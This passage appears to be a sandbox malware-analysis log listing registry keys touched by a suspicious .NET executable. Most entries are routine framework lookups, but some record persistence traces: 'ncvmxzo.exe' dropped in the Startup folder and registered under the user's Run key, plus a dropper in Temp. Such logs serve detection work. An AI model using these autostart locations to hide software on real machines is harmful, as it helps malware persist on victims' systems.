HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6c3a5a24\4bca598b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|fb.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|fb.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|fb.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6c3a5a24\3ac68cee
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ncvmxzo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|ncvmxzo.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|ncvmxzo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|ncvmxzo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ncvmxzoureascvnz

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
